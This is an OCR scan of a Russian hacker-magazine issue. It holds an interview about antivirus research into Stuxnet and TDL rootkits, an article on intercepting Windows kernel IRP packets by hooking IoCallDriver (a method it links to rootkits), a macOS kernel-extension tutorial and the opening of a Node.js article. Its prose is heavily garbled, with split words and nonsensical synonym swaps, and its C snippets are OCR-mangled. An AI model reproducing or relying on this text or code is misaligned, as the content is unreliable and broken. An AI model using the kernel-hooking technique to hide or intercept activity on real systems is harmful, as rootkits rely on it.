успеваем претворять в действительность да чужие нам ни ко чему. д

lrW

Пожал уй, диаграмм у Ган тая очерчивать безграмотный

насчёт дин увертливый высота около помощи со общества

гляди калькирование наших идей пишущий эти строки вроде раз в год по обещанию

wasm . г u . Что касается пр оверокна аффилирован­

как на блюдце наблюдаю, но, знаете, далеко не прелестно а

При ходит ся высматривать компромиссы, эдак в духе вместе с

ность из кибекриминальным миром, в таком случае они,

пок аза ывать пальцем в других . На антивирусном

карьеройресечерамнесовсемзавязыватьне

безусловно, есть, хотя выявлять их экстракт ваш покорнейший слуга безвыгодный буду.

~ буду, так на общих чертах постараюсь поплатиться .

хочет ся, только командой обслуживать а именно н адо.
Позт по отношению муукаждойгр у ппыаналитиковнара зных
исследовательских направленияхестьответ­

r.t

ЕСТЬ ЛИ ВООБЩЕУТВОЕГО ОТДЕЛА

0.;.1 ПОТРЕБНОСТЬ В НОВЫХ КАДРАХ?

ихразвити~послечегоонужетранслируетболее

УЧИТЫВАЯ И ДЕМОГРАФИЧЕСКИЙ СПАД В
РФ, И ПРОБЛЕМЫ РОССИЙСКОГО ОБРАЗОВА­

формальнуюпостановкузадачи непо средстве нно

НИЯ, НАСКОЛЬКО ВАМ УДАЕТСЯ ЗАКРЫВАТЬ

бери а налитиков . В одном изо направлений ми

ВСЕЖЕЛАЕМЫЕ ПОЗИЦИИ?

ст на е нный лицо , вместе с которым мы согласуюза дачи равно

требуется иметь роли аналитика из общим
руководством лабораторией. Покаэтотметод

lrW

Потр еб однако сть прозрачно есть, этак вроде

компромиссов работает хорошо, сточки зрения

~ интересных задач в меньшей мере безграмотный становится, а

процентнаго соотно ш ения общего времени

наличность рук является относительно граниченным множеством .

занятости, наверное, п олучается
управления равно

07% на пользу

03%в пользу ресеча . Совмещать зто,

Квалифицированные специалисты на нашей
области -это вернее призвание, нежели профессия,

конечно, невыгодный просто, равно в отдельных случаях подле ходится неде лями

а напряг увлеченных людей на этой предметной

появлять ся в домашних условиях за сле десяти вечера. Хорошо, ась?

области не без; каждым годом ощущается во се в большинстве случаев равным образом

близкиелюди относятся кэтому не без; пониманием да

свыше . У нас непрерывно открыт настройка сверху

всяч ески поддерживаютмою тяготение ко ис не без; ледова­

исследовательские объединение зиции по образу на России, эдак равным образом

тельской деятельности.

после рубежом

lwww.joineset.com). Причем питаться еще

большое состав примеров, рано или поздно н аши

r.t

КАКИЕ ФОРУМЫ , БЛОГИ И РЕСУРСЫ

0.;.1 ТЫ САМ ЕЖЕДНЕВНО МОНИТОРИШЬ?
ПОСОВЕТУЙ ЛУЧШИЕ РЕСУРСЫ, ЧТОБЫ
БЫТЬ В ТРЕН ДЕ ПОСЛЕДНИХ НОВОСТЕЙ В
ОБЛАСТИ МАЛ ВАРИ.

соотечественники выбирают работу после предела­
ми РФ да наша шарага во что такое? бы так ни стало правая рука огаете
переездом.

r.t

КАКИЕ ГЛАВНЫЕ РЕЗУЛЬТАТЫ

0.;.1 РАБОТЫТВОЕГО ОТ ДЕЛА ЗА ПОСЛЕД­

lrW

Если ваш брат хотите существовать на тренде последних

НИЙ ГОД, ЧЕМ ТЫ ЛИЧНО ГОРДИШЬСЯ ?

~ событий бери антивирусном поприще, то,
наверное, стои т подписаться бери блоги всех

lrW

Наверное, центральный гордостьюявляется

антивирусныхкомпаний,таккакпериодическиу

~ результатнашей исследовательской работы

многих можетчто-то интересное проскочить, да

"Stuxnet Undeгthe Micгoscope··. Наша шарашка

вернее сие перелистывать на первоисточнике, а неграмотный во

первой выпустила неделимый сообщение в области зтой

новостны х выжимка х. Много интересного позволительно

угрозе не без; подробным анализом вредоносных

сыскать втвиттере, разве подписаться бери известных

модулей данного червя . После сего я получали

западных исследователей. Причем допускается хорэ

благодарности с различных компаний равным образом

безграмотный только лишь найти, так равно обговорить вместе с ними найденн ую

гасорганов на процесс нескольких месяцев. Также

тему. Если вам хотите присутствовать во курсе мировых

нашауниверсальная обслуживающая программа на кримина­

тенденцийпообратномуанализ~тооднозначно

листическогоанализа скр ытой файловой от истем ы

игра стоит свеч подпи са ться возьми гeddit из фидом Re veгse

семейств руткитов TDL3/3+/4, которая стократ

Engine e г ing l www.гeddit.com/г/

ускоряетвремяизвлечения скрыто го контейнера,

Reveгse EnQ inee г i nQ ).

былаоченьтепло встреченазападными
правоохранительными органами.

r.t

РАССКАЖИ О КАДРОВЫХ ВОПРОСАХ .

0.;.1 КАКПРОИСХОДИТОТБОРКАНДИДА­

r.t

КАК ЧУВСТВ У ЕТСЯ КОНКУРЕНЦИЯ С

ТОВ В ТВОЙ ОТДЕЛ, КАКИЕ ПРИМЕРНО

0.;.1 ДРУ ГИМИ УЧАСТНИКАМИ РЫНКА?

ДАЮТСЯ ТЕС Т ОВЫЕ ЗАДАЧИ. ИССЛЕДУЕТЕ

ЗАИМСТВУЕТЕЛИ ДРУГУ ДРУГА ИДЕИ ,

ХАКЕР

00/153/2011

рынке оченьжесткая ко н курен ция , объединение этому

сот рудничество равно совместные проекты на этом месте

весть одиночно встречаются . ::I:

КОДИНГ

АлександРЭккерт

lstannic.manragmail.coml

Универ сальныи
"-"

ильтр

НЕСТАНДАРТНЫЙ
СПОСОБ ПЕРЕХВАТА
IRP-ПAKETOB
В этой статье ты да я рассмотрим, как, имея

жалкий опыт, поднатореть попросту от
полпинка , да совершеннонестандартно

вычислять фильтры уровня ядра.

На дискеты найдешь
рабочи й код, реали­
зующий перехват
loCaiiDriver, поль­
зуйся , а на благи х
целях!

Кстати, имей во во равным образом ду,
аюшки? однако новомодные

руткиты/буткиты
семейства будто

TDLЗ 041, во вкусе прави­
ло, пере х ватывают

loCaiiDriver, чтобы

Разработаем новоизобретённый методзаставить

того ради хоронить

систему сидеть в себя.

системе .

свое на чьих глазах во

ильтровать допускается nрактически что такое? угодно: приступ ко файлам,
загрузку библиотек равно первые шаги пр оцессов, отправку равно п рием дан­
ных п что до Сети, на конце ко нц ов, притискивание клави ш бери клавиатуре
равным образом ход мыши. Все сии образ действий осуществляются несколькими
способами . Как правил о, даже если голос соглашаться в отношении пользовательских компо­

нентах, так банальным перехватом нужных функций. Е сли но нужно

перехватитьданные на ядре, ведь у Micгosoft"a существуе т из п ециальная

конце пц ия фильтров равно мини-фильтров !более согласно др об н что касается об этом позволяется

-

почит ать сверху MSDN: http :Ugoo.gl/ kPt8b , ht t p:Ugoo.gl/i gDObl . К примеру,
с целью приглядывать вслед с nравляемыми на Сеть запросами п ользователь­

ских приложений, есть общеупотребительный вариантТDI-фильтра,
который-нибудь присоединяется на сетный стек. Или но принимать порядок соз дания
NDIS-IM-дpaйвepa, тот или другой в свой черед является своеоб разным сетев ым
фильтром. В общем, возможностей аспидски много, а вотспособов их
реализации в одно красота время маловато.

НОВЫЙ МЕХАНИЗМ
Как правило, просачивание происходит рядом помощи прис ое динения

своего объекта - побег тр ойства ко нужному стеку-сетевому, файловому равно
т. д. Более того, MicгosftWDM име н нотак да реком едует посту пать-и во

результате всетак равным образом работа у пают: вызовы l oCгeate D ev i ce да loAttachDevice

можноувидеть п очти на каждом фильтре, законном или — или безвыгодный очень. Смысл
бери ходящегос ваш покорный слуга на стеке фильтра-это проп ускатьче рез себя IRР-пак еты,
п уте ш ествующие туда-сюда, к п оиска да возможной сортировки, а
ино гда-и изменений, п еред а ваемы х на IRР-данных. Ничего вместе с л ожного

на этом нет, да удобный программ ист, написав пару-тр ойкуфи льтров
равным образом ра зобрав ши от ь на жизненном цикле IRР-п акетов, начинает ручаюсь только

перехватыватьданные, которые автор др по отношению гоняетмежду дев айсам равно . Что но
тутможноеще nридумать, не без; пр осиш ь ты. Един из твенное, сколько общего не запрещается
нате йти закачаешься всех сих фильтрах-устройствах, сие картель функции l oCaiiDгiveг.
Если поглядеть на ортоскоп бери эту фуй нкцию, так напрочь шиш при­

мечательного наша сестра с годами невыгодный уви партия . Вс ё, ась? возлюбленная делает, сие отматывает стека
наз а д равно вызываетmаjог-обработчика нижележащего удовольствие е р а, передав

е м ууказат ели нате объек т-ус тр ойство равно обрабатываемый IRP-naк eт.

NTSTATUS
FASTCALL
IQgfCallDriver(_ __

ХАКЕР

00/153/2011

Универсальный фильтр

_I_NYDEVICE_OВJECT

Ключевым время ом пользу кого филырации явля е т из моя персона парсинг не без; тр укту ­

DeviceOt)ject,
ры

IN OUT PIRP lr"R

_J ____________ --··--·--·

De vice Objec t. Пол у чив словарь н а

нее, автор лег ко половая принадлежность учи м указа­

т е ль нате прин а дле жащий от тр уктуре атрибут драйвера- структуру

DRIVER _OBJECT. Можно такж е разобрать стек, гд е бы л п ой­
IRP, для того этого, если бы помнишь, н ужно созывать IO_STACK_
LOCAТION *stack=IoGetCurrentirpStack Location(pirp). Далее до

{

Irp->Currentlocation--;
irpSp=IoGetNextirpStackLocation( Irp );
Irp->Tail.Overlay.CurrentStackLocation=irpSp;

ман вслед за х воп

указа т е лю получай со т ек твоя милость еще сможешь п роан ализир ова ть указате ль н а

_ _irpSp__:>Devicg_QbjeQ;_",_ oevi~;_g_Qbje~:!;; ·-------····-··--·--· ·····----- ---···-·
driverObject=DeviceObject->DriverObject;,_________
status=driverOt)ject->Major-Function[ir-p_.Sg->MajorFunction)( _ _
DeviceObject, Irp );
retu rn status;

<<oб ъeкт-фaйл >> -stack->FileObject. То естьтакими вона н ех итрыми
д ейс твиями твоя милость сможешь определить, слабо да кому пр е дн азначается
IRР - пак е т, давай а что-нибудь вместе с ним обстановка т ь- д ело преимущественно твое. Так , например,

не возбраняется воспретить зачитывание каки х- либо файлов вместе с прослойка а. Не н контия н в отношении 3 са ть
вместе с ложны е фильтры файловой сис темы в целях э тог о!
Достаточно заимствовать loC aiiDгiveг, сформировать фильтрацию
IRР-пакетов от кодом

Кстати, loCaiiDгiveг-этo nсевдоним встречаемого во литературе

IRP_MJ_CREATE, согласно указателю stack-> Fil eO bject

половая принадлежность у чить титул файла:

названия функции l ofCa iiDгi veг, которая, во свою очередь, всего делов лишь только
является заглушкой про вас зо ва l op fCaiiDгiv e г. М ож хотя враз отметить,

что-нибудь даже если фильтроватьданные во ядре выш ео nисанным образом, так
всё, нежели б инструмент е т себя выдавать из головой такая фильтрация,- сие безраздельно п ерехват
loCaiiDгiveг. И вс ё! Н е склифосовский су щ сделал твов ать на правах да х-то подозрительных устройств, прицепленны х на стек, никак не если т п ерех ват ов mаjог ­
обрабо тчиков во системе. В сё, ч т в отношении м ож хотя короче выискать , - сие изменен­

*fil eNameinformation=е;
status=ObQueryNameString( stack->FileObject,
fileNameinformation, 0е24, &retSize);
wcscat(fileNameinformatioll:)Name.Buffer,
_ _stack->FileObj_g_ct->FileName,_fuJffer); ___
ill;>gPrint("file name now is: %ws \!f, fileNameinfo cm_ation-"~Name.Buffer);
OВJECT_NAME_INFORMAТION

ный ячейка ф у нкции loCaiiDгiveг, а вотуж е определить, в чем дело? прямо
фильтр доллар т ся да какие сведения насчет хо дят че рез н у тро твоегонепростого

дра й вероучение [если он, конечно, су щ сделал тв ует отдельным файлом, н относительно в чем дело?

...п осле а завернутьэтотiRР-пакет, когда он, доп усище тим , пр едназна­
чен про открытия того файла, котор ый т ебе н полоз же следовать щитить .

меш ет заразитьдругой водитель ? ! , достаточно ужас да архи сложно.

Теперь самое краеугольный камень равным образом не без; амо е не без; ло ж н ое. Пр осто й перехват IRР -паке та ,
основанный сверху единственном хуке loCaiiDгi ve г, во нашей ситуации
безграмотный поможет, равно вона поч ему. Скажем , МJ-код

ULONG CreateDisposition=
_ (~tш;_k:? Pa c.<! meters .Crg_ate .OQ:!;_:!Qo.s» 04)_11! е,~хееееемt;
if((CreateDisgosition-=FILE CREATE) ll ____
(CreateDisposition==FILE_OPEN_IF )11
(CreateDisposition==FILE_OVERWRITE_IF))

IRP_ MJ _C REATE может

командироваться быть создании файла в дис ке тож быть соз дании сетевого
сое динения . Чтобы из действовать в некоторой степени выгодно е, п олучив наблюдение надо

IRР-пакетом со таким кодом, твой программа долж ен быть носителем опреде­
ленной логикой, позволяющей определить, куда-нибудь в частности равным образом из экий
целью посылается э оный IRР - п аке т, а чисто сие поуже хватит гем гвалт рно,

Irp->IoStatus.Status=STATUS_ACCESS_DENIED;
Ir-Q->IoStatus .Information=€!;___________
IoComgleteReguest(Irp,JQ_МQ_INCREMENT); _ _ _ _ __
ExFreeP_ool(file]"!ameinf or-matioo);
return STATUS_ACCESS_DENIED;

хотя всё ж е возможно . Вс ё -де ло во книга , ась? nри п ерех вате loCaiiDгi veг
во наши пакши п опадает равным образом движок возьми

DeviceObject, ра не без; мгла сив что ,
IRP. Воэьм ем

можнодостаточноточно определить, комупредназначается

сложности

точный близ мер . При чтении сканкода клавиатуры соответственно вместе с те ку подклю­

В со пособе фильтрации IRР-данных , основанном для п е ре х вате

ченны х <<ус тройств клавиатуры>> прогоняется IRР-пакет из кодом

IRP_ MJ_
READ. Мы п е ре х ватываем loCa i iDгive г, секс уч а емуказа тель бери IRР-пакет,
MajoгFunctioп которого равняетс ваш покорный слуга IRP_ MJ_ READ . Н относительно в духе определить, который

l oCai iDгi ve г, вкушать одн а серьез н ая со лож однако от ть . Д ело во т ом, сколько loCa iiDгi veг

является чрезвычайн по части используемой функцией во ядр е Windows"a. Это
связано со очевидным фактом -функция лишь только да обстоятельства ет, аюшки? отправля­

этотnак ет не зачем иное через клавиатуры? Для этого, на правах аз многогрешный поуже говорил, нам нуж­

ет IRР-пакеты по правую руку -нале изумительный , а во следовать имодействие среди драйверами­

так проанализироватьтакже пере х ваченныйукаэатель получи

усик трой из твами на ядре осно ван в рассуждении собственно для п осылке IRР -пакетов. Правд а,

OeviceO bject. В

вместе с лучае вместе с клавиатурой сие позволено свершить следующим образом.

Так наравне устройств на стеке может взяться н сделал колько , мо ж однако [как вари­

присутствие обслуживании обложка по части хныканье сис темы опять же по временам используется
аппарат

FastiO, хотя об этом за зже. Е со ли представить, сколько все каста ворох

ант! прямо проюрдонить имя тех дра йверов, которые создали сии

драйверов начинаетслатьдр уг другу IRР -пакеты равным образом равным образом х обрабатывать, ведь

устройст во а:

мож н в рассуждении л е гко перед ставит ь. какую нагрузку равным образом вместе с пытыва ет loCaiiDгiveг­
peчь можетидти в рассуждении далеко не ско льки х со тня х ваш брат зо ва х на от екунду. П оэтомууста­

BOOLEAN IsKeybordDevice(

DEVICE_OВJECT

* topDevice )

новка/с нятие пере х текстиль бери lоСаiiDгi vе г-делотонко е да несложно р у шащее
систему на лик е

{
_uNico~_ :?IBIN§_ dr.ivecNaJne

DEVI~_OВJECT

* device

RtliпitUnicodeStriпg(

=@; ___________________________

=е; _ _ _ _ _ _ _ _ _ _ - - - - - & driverName, L"\\Driver\\Kbdclass" );

BSOD"a не без; шифр ом DRIVER_UNLOADED_WIТHOUT_CANCELLING_

PENDING_OPERAТIONS. Это проис ходит обычно, ежели начинаешь быть
п е ре х вате безвыгодный оченьаккуратно уговаривать те документация , которые н есу т от

со схватка IRР-пак е ты. Спеш у пр едостеречь: необ хо димым условием твоего
драйвера, что хорошенького понемножку пере х ватывать loCaiiDгi ve г, должн а взяться гра­

for (device=TopDevice;
device;
device=device->DeviceObjectExtension->AttachedTo)c___ _ __

__ _____

_ {

if (__!RtlComgarei,inicodeString(_
&device->DriverObject->DriverName, &driverName, TRUE))
return TRUE;

мотная изготовление да из-за вершени е по сию пору х относительно вместе с мотренны х IRР-пакетов .

ЗАКЛЮЧЕНИЕ
К ак оказывается, вместе с свершать универсальныйинестандартный фильтр
кончено легко. А кабы порядочно в отношении пыт а кодинга драйверов , ведь соз­
настоящий фильтр будетобладать единаче да так ликой н а дескать ж ности. Возмож­
однако от тей применения у этой далеко не х итрой те х ники весть много, а з атраты в

реализацию минимальные- сие хо роший не без; тим ул пользу кого ра зви тия темы во

return FALSE;_

вплоть до машни х усище ловиях. Удачного компилирования , равно д а преб удете тобой
Сила! :Х:

ХАКЕР

00/153/2011

099

КОДИНГ

всевластный Захаров

[sevalavingrad .ru l

Ядром в области
Макинтошу
ИЗУЧАЕМ КЕRNЕL-КОДИНГ ПОД МАС OS Х
Разработка прикладных программ по-под Мае
равным образом

iOS релятивно

OS Х

мирово освещена во лите­

ратуре да интернете . А вроде насчеттемы создания
кода, что повинен проделываться во режиме

ядра? С этим- глухо. В этой статье автор сих строк попробу­
ем данную пристрастие рубить перед корень .

Я

POMACOSX

Для начала-немного теории, которая поможеттебе рядом создании рас­

ширений ядра. Мае ОSХоснована возьми ядреХNU IXNU is поt UNIXI.XNU-этo
гибридное ядро, которое состоит с нескольки х компонентов : подсисте ­
наш брат

Mach, BSD равным образом объектно-ориентированногофреймворкадля создания
00 Kit .

драйверов

Масh-это микроядро, созданное на результате исследований на
университете Карнеги во середине 00-х годов. Микроядерная архитект у­
ра , в духе известно, непло хо смотрится на презентация х, только , ко сожалению ,

приводит ко серьезным геморрой м из производительностью равным образом отладкой.

Видимо, посему пp oeктGNU/HURD, во котором доктрина
Сеть
Файловые

GNU п остроена никак не

возьми монолитном Liпu x, а возьми микроя д ре, до сей времени единаче д а л ек ото выпуска стабиль­
утнапиштим версии. Н ет-нет, невыгодный волнуйся, оборона Мае OSX наша сестра подобное никак не скажем, равно

систе-мы

далеко не никак не потому, в чем дело? боимся взвихривать яблочных фанатое
Мае

OSX подсистема Mach используется

:1. Дело во том, почто во

на серия измененном виде :

микроядро да постоянно компоненты, которые онодолжно обслуживать, соб раны
во едином адресном пространств е монолитного ядра. Такой ход, со одной

0/0Kit

сторо ны, позволяет обладать больше из труктурированное ядро, а со другой­
избавляетот nроблем не без; отладкой да nроизводительностью.

Масh-код на XNU отвечает вслед за подавляющая низкоуровневых функций:

Драйверы

ХNUвнутри

000



вытесняющая многозадачность;
виртуальнаяпамят~

межпроцессноевзаимодействи~

ХАКЕР

00 /153/201 0

Ядром сообразно Макинтошу

()00

SampleKext

по отношению

(о_. String Matehing

lnfo

дctl on

Croups & Files

J

Starch

!1 SampleKext

""\. Code

что касается

А

е
что касается

• Ci;;l source

Resources

что до

!Е) SampleKext.c

ео относительно

на

Products
._ @) тargets

в рассуждении

liJo

., ~

Executo:aЫes

Errors and Warnings

т

Find Results

• IJ!I вookmilrks

0> t;l SCM

...

kern_return_t.

0

Project Symbols
· ~ lmplemtnt01tl on Flles
NIB FHes

Soмp let:::ext _s tort

prlntf ( "KEXТ

(k.IIOd_lnfo_t

* ki ,

* d)

voi d

{

loade<lln" ) ;

return KERN_SI.CCESS ;

kern_return_t

$c:8c) leКext_s top

(1<.1100_\nfo_t

prtntf C KEXT ~.nlooded\n " ) ;

return

* ki,

vo id

* d)

{

KERН_SIXCE SS j

е Succeed~ ,а

0utld SUCCttdtd

0ulld SUCCttdtd
kехtудачно собрался

nрерывания;

по образу присущий , нуждаться использоватьдве машины: для одной работа­

консольный ввод-вывод.

ет ядро, а нате прочий - отладчик. Для отла д ки используется GDB. Когда

kext отлажен, его позволено обычай навливать во систему. Тогда из-за следовать гру зку
П одсистема В 00 ядра Мае 05Хоснована получи коде с FгeeB5D равным образом отвеча-

расширения рядом запуске сис темы короче ответствовать kext-manageг. Для

сего бандл kext"a нужно водворить на /5ystem/ Libгaг y/ E xtensions.

ет ради осуществление следующих задач:

При соз дании kext"oв [как равным образом остального со фта] во Мае 05Х используется

идентификацию пользователя да базовую трафарет безопасности;

P051 XAPI, системные вызовы В 00;
TCP/ IP В50-сокеты;

XCode . Поnробуем учредить nростое расширениеядра со через этой IDE.
Для сего нам нужно:

файловые сис темы;
отличаются как небо и земля машины синхронизации ;

поддержку реального времени.

Для взаимодействия от оборудованием на ядре Мае 05 Х прим еняется
конструкт но- орие нтированный фреймворк

0. ЗапуститьХСо dе :].
0. Создать новомодный nроект да сре ди шабл оно на облюбовать Generic Keгnel
Extension, потому автор сих строк будем основывать пр остое рост бери С,
а безграмотный 00 К it -драйвер в С++.
0. В качестве имени проекта указать5аmрlеКехt [да, моя персона настаиваю :11.

00 Kit . Он равным образом из пользуетограни­

ченное множество С++ на качестве языка программирования . В нем,

Если твоя милость в точности реализовал переданный раньше элементарный

например, отсутствуюттакие основы , во вкусе исключения, множествен­

ал г орит м, ведь на качестве его логичногозавершен да пишущий эти строки доктрина соз даст

ное наследование, шаблоны равным образом RПI. Каждый фрукт сервиса ядра либо

следовать нас обложка 0ampleKext.c. В нем будут со придерживать ся двум функции :

устройства пр едста вл ен на 00 Kit на виде класса С++ , а отдельный неабстрактный

0ampleKext_staгt да 0ampleKext_ stop . Как твоя милость ранее догадался , сии функ­

услуга или — или устройс тво-в виде объекта сего класса. Короче говоря ,

ции вызываются быть загрузке/выгру з ке расширения . В шаблоне сии

шофер

функции нисколько полезног что до н е -де лают, а во реальном kext"e они отвечают

00 Кit-это объект, кой управляетустройством другими словами шиной ,

nредставляя отвлеченный интерфейс ко ним ради других частей системы.
New Project

MO,lJ,YЛИЯ,lJ,PA
Мае 05 Х предо ста вля ет вот змож ность распространять стержень не без; nомощью

Choose

динамической загрузки модулей ядра, которые называют kехt"ами [от

~

keгnel extensionl . Е сли твоя милость отнюдь не собираешься выправлять исходники XNU,

template for your new project:

Mac.OSX

Applic.1tion

ведь единственная возм ожность нагнать адрес во режиме ядра - сие

Audio Unlts
Autom;~tor Actlon

сочинение равно погрузка расширения. Так, драйвера IOKit реализованы

Generic Kernel

особенно на виде kext"oв. Кехt"ы -это бандлы, во вкусе да обычные пользова­

"

j.1Vi1

висимости модуля;

бинарные файлы модуля ядра-файлы во Ма сh-0-фо рмат е, на которых
содержится код, nодгружаемый на адресное прогалина ядра;

Standard Apple Plug-ins
St01tic Libr.1 ry

Other

ресурсы- иконки, эмпирика с целью локализации равно т.п.

Когда

IOKitDriver

Extenslon

Bundle
Command Llne Utility
Dynamic Llbrilry
Framework

тельские приложения Мае 05 Х, да они содержат:
plist-фaйл , на кото кашаса описано содерж имое бандла, установки равно за­

а

kex t соз д ан, найти применение его на суть дозволительно вместе с через команды

kextload изо терминала . При этом нуждаться владеть пр ава администра­

Тhis

project builds

а

kernel extenslon.

J

ведь ра . Отлаживать kext " ы из ложнее пользовательских приложений. В

первую очередь, нужно позволить отладку ядра . Для отладки ядра,

ХАКЕР

00 /153/20 01

Выбирае м привычка ради nроекта

001

КОДИНГ

users -mac-pro:Debug user$ sudo ер -R SampleKext.kext /tmp
users-mac-pro:Debug user$ sudo kextload /tmp/SampleKext.kext
kextload: /tmp/SampleKext.kext loaded successfully
users -mac -pro:Debug user$ sudo kextunload /tmp/SampleKext . kext
kextunload: unload kext /tmp/SampleKext.kext succeeded
users-mac-pro : Debug user$ tail -5 /var/log/system.log
Jul 0 00:10:27 users-mac-pro sudo[309]:
user : TTY=ttys001 ; PWD=/Users/user/Documents/Sampl
eKext/build/Debug ; USER=root ; COHNAND=/Ьin/cp -R SampleKext . kext /tmp
Jul 0 00:10:45 users-mac-pro sudo[310]:
user : TTY=ttys001 ; PWD=/Users/user/Documents/Sampl
eKext/build/Debug ; USER=root ; COM~~ND=/sbin/kextload /tmp/SampleKext . kext
Jul 0 00:10:45 users -mac-pro kernel[O]: КЕХТ loaded
Jul 0 00:10:52 users-mac -pro sudo[311):
user : TTY=ttysOOl ; PWD=/Users/user/Documents/Sampl
eKext/bu ild/Debug ; USER=root ; CO~~ND=/sbin/kextunload /tmp/SampleKext.kext
Jul 0 00:10:52 users-mac-pro kernel[O]: КЕХТ unloaded
users-mac-pro:Debug user$

Подгружаем kехtдля тестирования

вслед регистрацию callback"oв интересах различных событий ядра равно некоторые

CFBundleVersion-вepcия бандла .

действияпоинициализации/деинициализациирас шир ения. Напри ­

OSBundleLibraries- либы, с которых зависит kext.•

мер, во SampleKext_staгt пишущий сии строки могли бы зарегистрироватьсокет, помощью

IOКitPersonalities-oбъeкты

какой прикладные программы могли бы якшаться вместе с нашим kext"oм.

таковой kext. Если сие драйвер, очевидно .

00 Kit, к котофей орых нужно подгружать

Но чтобы основные принципы я на сих функцияхтолько выведем тестовые сообще­

ния, которые допускается если т заметить быть вслед гр узке/выгрузке расширения.

Поскольку ты да я создаем далеко не драйвер, а обычное продолжение
ядра, к корректной загрузки kехt "ад остаточно хорэ исправить

S.i!J!Iple~e.J!t&

______________________________________. ___ _

ltiш;JyJ!e_.S~Y-~L.sYs:tm, b~ .---·-···--

_____________ . __ _____ _ ______ _

#include_<:mach/mach _types , _h>
kern_return_t MyKext_start (kmod_info_t
{
printf( "Ke.J!1:_lgaded. \ n" );

--

Лt!J.rд.J5IBN_SJ,!CCISS; ____

OSBundlelibгaгies. Для того с целью автоматом надергать ведомость всех ком­
понентов, с которыхзависит расширение, позволительно использоватьутилиту

kextlibs. Запустив ее от ключом -xml, твоя милость за единый вздох получишьХМ L-к од, кой

* ki,

void

* d)

- - - - ····-------- ----·-- ·- --·--

}
kern_return_t MyKext_stop (kmod_info_t

* ki,

void

* d)

нужнодобавить во plist-фaйл:

kextlibs -xml M}"Kext.!g!JIL
0.!se}"2QSBundleLibrarie.sill.e}"_>_. ___________. ___.................._____ _
~Qict >

·-·-----·-

~ey>com . ;эpp1e •.kpJ,Jj.JJ_kern</keY2

<string>9. 0. 0</string>
</dict>

printf( " Kext unloaded.\ n" );
return KERN_SUCCESS;

Сборкапроектапослеэтогопройдетбезпроблем,ноеслитыпопро­
буешьзагрузитьSаmрlеКехt . kехt, ведь шиш хорошего отнюдь не получится,

Наш kext зависит общем отодно го элемента. Скопируем нынешний шифр на
lnfo.plist. Для того с целью свой kext заработал, остался единолично капитальный шаг:
бандл kext"a потребно относиться адми ни стратору. Для тестирования
скопируем его на /tmp справами рута:

ввиду наш брат снова никак не позаботилисьо содержимом plist-фaйлa. Каждый

kext во что-нибудь бы в таком случае ни стало полагается обнимать lnfo.plist на ХМ L-ф ормате .

Посмотрим

sudo ер -R SampleKext.kext /tmp

важныедля правильной загрузки расширения ключи во этом файле:

CFBundleldentifier- идентификатор kext"a. Например, com.apple .

Воттеперь можнозагружать выше- модуль:

dгiveг. AppleUSBMeгgeNub.
СFВuпdlеЕхесutаЫе-бинарный обложка

случае

kext"a.

Его может да невыгодный бытийствовать на

sudo kextlpaJJ..Lt.rnp/SampleKex t....kei<.:t.________________________________..

00 Кit-драйверов.
После зто го на /vaг/log/system.log твоя милость можешь вкусить суд нашего

kext "a . Чтобы выгрузить kext, используем kextunload: sudo kextunload 0
tmp/SampleKext.kext.

ДЛЯКОРРЕКТНОЙЗАГРУЗКИ
КЕХТ•А ДОСТАТОЧНО

Мы создали токсоплазма модульядрадля Мае

OSX. Все, зачем спирт умеет

получи и распишись сегодня, - сие корректным образом загружаться равно выгружаться. В
идеале а модули ядра могут прилагаться далеко не всего только для того создания

БУДЕТ ПОПРАВИТЬ

драйверов, да и, например, чтобы вынесения то и дело используемой мно­

OSBUNDLELIBRARIES

Удачно го kегnеl-кодингаl :Х:

002

гими прикладными программами функциональности на услуги ядра.

ХАКЕР

00/153/ 0011

Сергиян Конаненка lkononenchegГclgmail.co ml

ПИШЕМ СЕРВЕР
МГНОВЕННЫХ

СООБЩЕНИЙ

HANODE.JS
Все знают, что-то такое
JavaScгipt. Но маловато кто такой
может помыслить его

обрабатывающим никак не машинопись
во дивах равным образом спанах, а тысячи

да тысячи входящих запро­

сов. Мы днесь никак не только лишь
представим, однако равным образом разрабо-

таем бери

nodejs.oгq -caйт
nроекта,здесьже
материал равным образом
nримеры.

JS родной

сервер!

Масштабируемость­
сие недугующий воnрос
интересах Node.js.
Основная nроблема­
связь
междуnроцессами.

Но питаться изящное
вотум не без; nомощью

рuЫish/suЬsсгiЬе­
вэаимодействия,
использующего базу
данных Redis. Воз­
можно, ты да я об этом сызнова
наnишем .

ХАКЕР

00/153/2011

JavaScri pt интересах сервера

ЧТО ТАКОЕ

NODE.JS

Раньш е интересах создания ка со тамного из ервера н е обходимо было припожить

порядком усилий , а исполнение асин х ронной моде лиуправления вводом
равно выводом до самого со тавляла вагон проблем . Даже Pythoп со Twisted не без; пасал
погано . Однако со появлени е м Node.jsзaдaчa н е вероятноупростилась.
Если беседовать википедийно, так Node .j s -этo событийно ­

ориентированная

0/0 серверная общество в целях JavaScгipt . А неточно говоря,

от пециальный JаvаS из гiрt - фр е ймворк, в соответствии с з воляющий д е лать вещи, на
общем , чтобы моя персона ва не без; склеп безграмотный х арактерны е, словно работы вместе с файловой

0 О OJ_ otf
~

GoosJie Ubr•rles

АР

Х ~О: ВООО

c:J Socl•l IIJ: Отlср~о~т н;tбор н• "")"

Х , -Е) Google Docs - Hom Х

~~ ХАКЕР - node.js - С.

xj

х ~

"" LONG POLLING

- - - - - - - - -~...;
to(:[l!
.o.l Cl
D Research CJ Docs CJ Work CJ News CJ Other

l!fJ

$

Сообщсtmс д11JI всех! Сообщение ДJ1JI всех! Сообщсtmе ДJ1JI всех! Сообщс1оtс д11JI вссх! Сообще1оtе д11JI вссх!
CooбщcJrnc интересах всех! Сообщсtmс дпя всех! Сообщсtоtс дп.я всех! Сообщснисдпя всех ! Сообщение дlUIВCCXI
Сообщсtоtс д.ля всех! Сообщсt оtс с целью всех! Сообщсtmс дпя всех! С ообщсtmс д11Я оссх! СообщсJmе д.пя всех!
Сообще1оtе д.пя всех! СообщсJоtс дп.явссх! Сообщеtmе на всех! С ообщс.tоtс пользу кого ВCCJt! Сообщеtоtс дпя всех!

С ообщешtе АЛЯ всех! Сообщсшtс для того всех! CooбЩCJDte чтобы вссх! С ообщение A11J1 всех! Сообщсюtе д11Я .всех!
Сообщеtmе АЛЯ всех! Сообщсшtе ц,:tя всех! Сообщение дпя всех! С ообщсtwс .Q1I.R всех! Сообщсtоtе ддявссх!
С ообщеtmедпя всех! Сообщсниед11Я всех! Сообщснисд1U1 всех! СообщсниедnJI всех! Сообщсшmд1U1 вссх!
